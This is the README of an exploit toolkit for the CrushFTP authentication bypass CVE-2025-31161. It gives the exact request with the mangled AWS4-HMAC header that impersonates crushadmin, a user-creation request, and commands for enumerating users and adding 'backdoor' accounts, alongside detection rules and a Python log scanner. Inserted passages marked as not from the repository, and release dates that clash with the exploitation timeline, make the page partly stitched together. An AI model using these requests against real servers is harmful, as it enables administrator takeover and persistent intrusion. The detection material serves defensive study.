
CVE-2025-31161 PoC — CrushFTP Security Vulnerability

Associated Vulnerability
Title: CrushFTP Security Vulnerability (CVE-2025-31161)
Description: CrushFTP 10 before 10.8.4 and 11 before 11.3.1 allows authentication bypass and takeover of the crushadmin account (unless a DMZ proxy instance is used), as exploited in the wild in March and April 2025, aka "Unauthenticated HTTP(S) port access." A race condition exists in the AWS4-HMAC (compatible with S3) authorization method of the HTTP component of the FTP server. The server first verifies the existence of the user by performing a call to login_user_pass() with no password requirement. This will authenticate the session through the HMAC verification process and up until the server checks for user verification once more. The vulnerability can be further stabilized, eliminating the need for successfully triggering a race condition, by sending a mangled AWS4-HMAC header. By providing only the username and a following slash (/), the server will successfully find a username, which triggers the successful anypass authentication process, but the server will fail to find the expected SignedHeaders entry, resulting in an index-out-of-bounds error that stops the code from reaching the session cleanup. Together, these issues make it trivial to authenticate as any known or guessable user (e.g., crushadmin), and can lead to a full compromise of the system by obtaining an administrative account.
Readme
# CrushFTP Authentication Bypass - CVE-2025-31161

[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
[![CVE](https://img.shields.io/badge/CVE-2025--31161-red.svg)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31161)
[![Go](https://img.shields.io/badge/Go-1.20+-blue.svg)](https://golang.org/)
[![Bash](https://img.shields.io/badge/Bash-4.0+-green.svg)](https://www.gnu.org/software/bash/)

A comprehensive toolkit for exploiting CVE-2025-31161, an authentication bypass vulnerability in CrushFTP that allows unauthorized user account creation.

## 🔍 What is CVE-2025-31161?

CVE-2025-31161 is a critical authentication bypass vulnerability in CrushFTP that lets an unauthenticated attacker obtain a session as an existing user (`crushadmin` by default) and, through the web interface's user management functionality, create unauthorized user accounts.

### Technical Details
- **CVSS Score**: TBD
- **Affected Software**: CrushFTP 10 before 10.8.4 and 11 before 11.3.1 (HTTP(S) web interface; deployments behind a DMZ proxy instance are not affected, per the CVE entry above)
- **Attack Vector**: Network
- **Authentication Required**: None
- **Impact**: Complete system compromise through unauthorized account creation

## 🚀 Features

- **Multi-Language Support**: Go and Bash implementations
- **Smart Vulnerability Detection**: Automatically checks if target is vulnerable before exploitation
- **User Enumeration**: List existing users on vulnerable targets
- **User Creation**: Create new administrative accounts
- **Interactive Mode**: Prompts for credentials only when target is confirmed vulnerable
- **Shorthand Flags**: Quick access with `-t`, `-p`, `-tu` flags
- **Custom Port Support**: Configurable port for different deployment scenarios
- **Educational Focus**: Designed for CTF challenges and security research

## 📁 Repository Structure

```
CrushFTP-auth-bypass-CVE-2025-31161/
├── README.md                 # This documentation
├── cve-2025-31161.go        # Go implementation (recommended)
├── cve-2025-31161.sh        # Bash implementation
└── LICENSE                  # MIT License
```

## 🛠️ Installation & Requirements

### Prerequisites

#### For Go Version (Recommended)
```bash
# Install Go (if not already installed)
sudo apt install golang-go
# or
wget https://go.dev/dl/go1.21.0.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
```

#### For Bash Version
```bash
# Requires curl (usually pre-installed)
sudo apt install curl
```


### Quick Setup
```bash
git clone <repository-url>
cd CrushFTP-auth-bypass-CVE-2025-31161
chmod +x cve-2025-31161.sh
```

## 🎯 Usage

### Go Version (Recommended)

#### List Users
```bash
# Basic usage with shorthand flags
go run cve-2025-31161.go -t example.com -lu

# With custom port
go run cve-2025-31161.go -t example.com -p 8080 -lu

# Long form flags
go run cve-2025-31161.go --target_host example.com --port 8080 -lu
```

#### Add New User
```bash
# Create new user (will prompt for username/password)
go run cve-2025-31161.go -t example.com -au

# With custom target user (default: crushadmin)
go run cve-2025-31161.go -t example.com -tu admin -au

# Long form flags
go run cve-2025-31161.go --target_host example.com --target_user admin -au
```

### Bash Version

#### List Users
```bash
# Basic usage
./cve-2025-31161.sh -t example.com -lu

# With custom port
./cve-2025-31161.sh -t example.com -p 8080 -lu
```

#### Add New User
```bash
# Create new user
./cve-2025-31161.sh -t example.com -au

# With custom settings
./cve-2025-31161.sh -t example.com -p 8080 -tu crushadmin -au
```

### Available Flags

| Flag | Long Form | Description | Default |
|------|-----------|-------------|---------|
| `-t` | `--target_host` | Target hostname or IP (required) | - |
| `-p` | `--port` | Target port | 80 |
| `-tu` | `--target_user` | Target user for exploitation | crushadmin |
| `-lu` | `--list-users` | List existing users | - |
| `-au` | `--add-user` | Add new user (interactive) | - |
| | `--help` | Show help message | - |

### Usage Examples

```bash
# Example 1: Enumerate users on target
go run cve-2025-31161.go -t ftp.example.htb -lu

# Example 2: Create backdoor account
go run cve-2025-31161.go -t ftp.example.htb -au
# Then enter: username: backdoor, password: P@ssw0rd123

# Example 3: Non-standard port with user enumeration
./cve-2025-31161.sh -t 192.168.1.100 -p 9090 -lu

# View help
./cve-2025-31161.sh --help
```


## 🔄 How It Works

```mermaid
flowchart TD
    A[Start Exploit] --> B[Check Target Connectivity]
    B --> C{Target Reachable?}
    C -->|No| D[Exit: Connection Failed]
    C -->|Yes| E[Send getUserList Request]
    E --> F{Response Contains OK?}
    F -->|No| G[Exit: Not Vulnerable]
    F -->|Yes| H[Target is Vulnerable!]
    H --> I{Mode Selected?}
    I -->|List Users -lu| J[Parse XML Response]
    J --> K[Display User List]
    K --> L[Exit: Success]
    I -->|Add User -au| M[Prompt for Username]
    M --> N[Prompt for Password]
    N --> O[Send Warm-up Request]
    O --> P[Craft User Creation Payload]
    P --> Q[Send setUserItem Request]
    Q --> R{User Created Successfully?}
    R -->|Yes| S[Success: Account Created]
    R -->|No| T[Failed: Exploitation Failed]

    style A fill:#e1f5fe
    style H fill:#c8e6c9
    style K fill:#81c784
    style S fill:#4caf50
    style D fill:#ffcdd2
    style G fill:#ffcdd2
    style T fill:#ffcdd2
```

## 🧪 Exploit Flow Explained

### Step 1: Vulnerability Detection
The script first sends a `getUserList` request to check if the target is vulnerable:
```http
GET /webinterface/function/?command=getUserList&serverGroup=MainUsers&c2f=wIwV HTTP/1.1
Host: <target_host>
Cookie: CrushAuth=1758816957058_vuiPVygdYnM1kzYGOs9d3tzIbFWIwV
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
```

If the response contains `<response_status>OK</response_status>`, the target is vulnerable.

### Step 2a: User Enumeration (List Users Mode)
When using the `-lu` flag, the script parses the XML response and extracts usernames:
```xml
<user_list type="vector">
    <user_list_subitem>ben</user_list_subitem>
    <user_list_subitem>crushadmin</user_list_subitem>
    <user_list_subitem>default</user_list_subitem>
</user_list>
```

Output:
```
[+] Users:
  - ben
  - crushadmin
  - default
```

### Step 2b: User Account Creation (Add User Mode)
When using the `-au` flag, the script sends a `setUserItem` request with malicious XML payload:
```http
POST /webinterface/function/ HTTP/1.1
Host: <target_host>
Content-Type: application/x-www-form-urlencoded

command=setUserItem&data_action=replace&serverGroup=MainUsers&username=newuser&user=<USER_XML>&xmlItem=user&vfs_items=<VFS_XML>&permissions=<PERMISSIONS_XML>&c2f=31If
```

### Step 3: Verification
The script checks for `<response_status>OK</response_status>` in the response to confirm successful user creation.

---
## ⚠️ Vulnerability Details

### Root Cause
The vulnerability stems from insufficient authentication checks in the CrushFTP web interface's user management functionality. As the CVE entry above describes, an `Authorization: AWS4-HMAC-SHA256` header that names an existing user followed by a slash authenticates the session as that user without a password, and the missing `SignedHeaders` entry causes an index-out-of-bounds error before the session cleanup runs. The application then accepts user creation requests from that session without the caller ever having proven its identity.
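As an added illustration (not CrushFTP's code and not part of this repository), the following Python model follows the sequence the CVE entry above describes: the session is bound to a user as soon as the username lookup succeeds, and the `SignedHeaders` lookup raising on a header cut off after `user/` skips the cleanup. `handle_hardened` shows the fail-closed shape: parse and verify everything first, bind the session only on success. The per-user secrets and the string to sign are constructed assumptions.

```python
import hashlib
import hmac

# Constructed per-user secrets and a fixed string to sign for the model;
# they stand in for whatever CrushFTP actually derives and are not its code.
USER_SECRETS = {"crushadmin": b"admin-secret", "ben": b"ben-secret"}
STRING_TO_SIGN = b"GET /webinterface/function/"

def field(auth, key):
    """Return the value of 'key=...' in a comma-separated AWS4 header.
    Raises IndexError when the key is absent, as on the mangled header."""
    parts = [p.strip() for p in auth.split(",") if p.strip().startswith(key + "=")]
    return parts[0].split("=", 1)[1]

def signature_ok(user, auth):
    expected = hmac.new(USER_SECRETS[user], STRING_TO_SIGN, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, field(auth, "Signature"))

def make_header(user):
    """Well-formed header for the model, used to show the normal path still works."""
    sig = hmac.new(USER_SECRETS[user], STRING_TO_SIGN, hashlib.sha256).hexdigest()
    return (f"AWS4-HMAC-SHA256 Credential={user}/20250401/us-east-1/s3/aws4_request, "
            f"SignedHeaders=host;x-amz-date, Signature={sig}")

def handle_vulnerable(auth):
    """Model of the flow in the CVE text: the session is bound to the user once
    the lookup succeeds, and cleanup sits after checks that may never run."""
    session = {"user": None}
    try:
        user = field(auth, "AWS4-HMAC-SHA256 Credential").split("/")[0]
        if user in USER_SECRETS:
            session["user"] = user          # lookup succeeded: 'anypass' login
        field(auth, "SignedHeaders")        # IndexError on 'Credential=user/'
        if not signature_ok(user, auth):
            session["user"] = None          # cleanup: never reached after the raise
    except IndexError:
        pass                                # request handling carries on regardless
    return session["user"]

def handle_hardened(auth):
    """Fail closed: parse and verify everything first; bind the session only on success."""
    try:
        user = field(auth, "AWS4-HMAC-SHA256 Credential").split("/")[0]
        field(auth, "SignedHeaders")
        if user in USER_SECRETS and signature_ok(user, auth):
            return user
    except IndexError:
        pass
    return None
```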

### Impact Assessment
- **Confidentiality**: HIGH - Unauthorized access to file system
- **Integrity**: HIGH - Ability to modify/upload files
- **Availability**: MEDIUM - Potential for resource exhaustion

### Attack Scenarios
1. **Initial Access**: Create backdoor accounts for persistent access
2. **Privilege Escalation**: Create admin-level accounts
3. **Data Exfiltration**: Access sensitive files through FTP interface
4. **Lateral Movement**: Use compromised FTP server as pivot point

---
## 🛡️ Detection & Mitigation

### Detection Methods
- Monitor web logs for `getUserList` and `setUserItem` requests to `/webinterface/function/`, especially from sources with no preceding normal login
- Flag `Authorization: AWS4-HMAC-SHA256` headers whose `Credential=` value is only a username and a slash with no `SignedHeaders` entry (the mangled header shown in Step 1)
- Check for new user accounts created outside normal processes
- Implement anomaly detection for authentication bypass patterns

### Mitigation Strategies
1. **Immediate**: Block access to `/webinterface/function/` endpoints
2. **Short-term**: Update to a patched CrushFTP version (10.8.4 or 11.3.1 and later, per the CVE entry above)
3. **Long-term**: Implement proper authentication controls

### Network Signatures
```
# Snort/Suricata rule example (the command is sent in the POST body, see Step 2b)
alert http any any -> any any (msg:"CrushFTP CVE-2025-31161 Exploit Attempt"; flow:established,to_server; content:"command=setUserItem"; http_client_body; content:"serverGroup=MainUsers"; http_client_body; sid:1000001; rev:1;)
```
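An added log-scanning example in Python (not part of the repository): it reads constructed proxy log records carrying each request's `Authorization` header and body, and flags the two indicators this page shows, an AWS4 header of the form `Credential=<user>/` with no `SignedHeaders`, and `getUserList`/`setUserItem` commands sent to `/webinterface/function/`. The JSON record format and the RFC 5737 addresses are constructed assumptions.

```python
import json
import re
from urllib.parse import parse_qs

# Constructed log records (not real traffic): one JSON object per request, as a
# reverse proxy in front of CrushFTP might write them. IPs are RFC 5737 examples.
SAMPLE_LOG = r'''
{"src": "203.0.113.5", "method": "GET", "uri": "/webinterface/function/?command=getUserList&serverGroup=MainUsers&c2f=wIwV", "authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/", "body": ""}
{"src": "198.51.100.7", "method": "GET", "uri": "/", "authorization": "", "body": ""}
{"src": "203.0.113.5", "method": "POST", "uri": "/webinterface/function/", "authorization": "", "body": "command=setUserItem&data_action=replace&serverGroup=MainUsers&username=newuser&xmlItem=user&c2f=31If"}
{"src": "192.0.2.9", "method": "GET", "uri": "/bucket/report.txt", "authorization": "AWS4-HMAC-SHA256 Credential=ben/20250402/us-east-1/s3/aws4_request, SignedHeaders=host;x-amz-date, Signature=abc", "body": ""}
'''

AWS4_CREDENTIAL = re.compile(r"^AWS4-HMAC-SHA256\s+Credential=([^/,\s]+)/")
MANAGEMENT_COMMANDS = {"getUserList", "setUserItem"}

def mangled_aws4_user(authorization):
    """Username from an AWS4 header with the bypass shape from the CVE text
    ('Credential=user/' and no SignedHeaders); None for a complete SigV4 header."""
    m = AWS4_CREDENTIAL.match(authorization)
    if not m or "SignedHeaders=" in authorization:
        return None
    return m.group(1)

def management_command(uri, body):
    """The user-management command named in the query string or form body of a
    request to the CrushFTP web-interface function endpoint, else None."""
    path, _, query = uri.partition("?")
    if not path.startswith("/webinterface/function/"):
        return None
    params = parse_qs(query)
    params.update(parse_qs(body))
    for cmd in params.get("command", []):
        if cmd in MANAGEMENT_COMMANDS:
            return cmd
    return None

def scan(log_text):
    """Return (source, indicator, detail) triples for every record that matches."""
    findings = []
    for line in log_text.strip().splitlines():
        rec = json.loads(line)
        user = mangled_aws4_user(rec.get("authorization", ""))
        if user:
            findings.append((rec["src"], "mangled-aws4-auth", user))
        cmd = management_command(rec["uri"], rec.get("body", ""))
        if cmd:
            findings.append((rec["src"], "management-command", cmd))
    return findings
```

Correlating both indicators from the same source, as the first and third sample records show, is the strongest signal: a mangled header followed by a management command is the exact sequence described in Steps 1 and 2b.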
---
## 🎓 Educational Use Cases

### CTF Scenarios
- **Web Application Security**: Understanding authentication bypass vulnerabilities
- **Penetration Testing**: Demonstrating real-world exploitation techniques
- **Red Team Exercises**: Simulating APT-style attacks

### Learning Objectives
- Understanding HTTP request manipulation
- XML injection techniques
- Authentication bypass methodologies
- Multi-language exploit development

## 🚨 Legal Disclaimer

⚠️ **IMPORTANT**: This tool is designed for:
- Educational purposes
- Authorized penetration testing
- CTF competitions
- Security research in controlled environments

**DO NOT USE** on systems without explicit written permission. Unauthorized access to computer systems is illegal and may result in severe legal consequences.

## 🤝 Contributing

Contributions are welcome! Please:

1. Fork the repository
2. Create a feature branch (`git checkout -b feature/improvement`)
3. Commit your changes (`git commit -am 'Add new feature'`)
4. Push to the branch (`git push origin feature/improvement`)
5. Create a Pull Request

### Development Guidelines
- Follow existing code style
- Add comprehensive comments
- Test on multiple target environments
- Update documentation for new features

## 📝 Version History

| Version | Date | Changes |
|---------|------|---------|
| 1.0.0 | 2025-01-XX | Initial release with Go and Bash implementations |
| 1.1.0 | 2025-01-XX | Interactive mode and vulnerability detection |
| 1.2.0 | 2025-10-02 | Added user enumeration (-lu), separate add user mode (-au), shorthand flags (-t, -p, -tu) |

## 📚 References

- [CVE-2025-31161 Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31161)
- [CrushFTP Official Website](https://www.crushftp.com/)
- [OWASP Authentication Bypass](https://owasp.org/www-community/attacks/Authentication_bypass)
- [Original Research by Immersive Labs](https://github.com/Immersive-Labs-Sec/CVE-2025-31161)

---
## 📧 Contact

For questions, suggestions, or security concerns, please open an issue in this repository.